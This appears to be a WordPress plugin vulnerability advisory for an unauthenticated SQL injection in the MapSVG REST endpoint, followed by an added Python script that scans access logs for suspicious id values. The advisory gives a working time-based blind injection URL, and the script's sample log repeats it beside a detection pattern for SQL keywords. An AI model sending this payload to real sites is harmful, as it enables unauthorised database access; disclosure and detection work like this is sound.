The plugin does not validate and escape a parameter received via a REST endpoint before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
https://example.com/wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--+
Brandon James Roldan
Brandon James Roldan
Yes
2022-04-18 (about 1 year ago)
2022-04-18 (about 1 year ago)
2022-04-19 (about 1 year ago)
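To check whether a site received requests shaped like the proof of concept above, the following added example (not part of the original advisory or the plugin's code) scans web server access log entries for calls to the `/wp-json/mapsvg/v1/` route whose `id` query parameter is not a plain integer. The log format, the sample entries and the assumption that a legitimate `id` is always numeric are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

ROUTE_PREFIX = "/wp-json/mapsvg/v1/"  # route prefix from the PoC URL above
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line in a log entry
SQL_HINT_RE = re.compile(r"(?i)\b(?:sleep|benchmark|select|union)\b|--|'")

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [18/Apr/2022:09:58:11 +0000] '
    '"GET /wp-json/mapsvg/v1/maps/2?id=2 HTTP/1.1" 200 812',
    '203.0.113.7 - - [18/Apr/2022:10:00:00 +0000] '
    '"GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20'
    '(SELECT(SLEEP(5)))b)--+ HTTP/1.1" 200 812',
    '203.0.113.7 - - [18/Apr/2022:10:00:09 +0000] '
    '"GET /wp-json/mapsvg/v1/maps/2?id=1%2527 HTTP/1.1" 200 812',
    '198.51.100.4 - - [18/Apr/2022:10:01:30 +0000] '
    '"GET /wp-json/wp/v2/posts?id=abc HTTP/1.1" 200 90',
]


def suspicious_id(target):
    """Return the decoded `id` value if it is not a plain integer, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith(ROUTE_PREFIX):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "id":
            value = unquote_plus(value)  # second pass catches double encoding
            # Assumption: a legitimate id is ASCII digits only.
            if not re.fullmatch(r"[0-9]+", value):
                return value
    return None


def scan(lines):
    """Return (client_ip, decoded_id, has_sql_tokens) for each flagged entry."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        value = suspicious_id(match.group(1)) if match else None
        if value is not None:
            hits.append((line.split(" ", 1)[0], value, bool(SQL_HINT_RE.search(value))))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

WordPress also serves REST routes through the `?rest_route=` query form, and parameters sent in a request body do not appear in access logs, so a clean result from this path-based check does not rule out exposure.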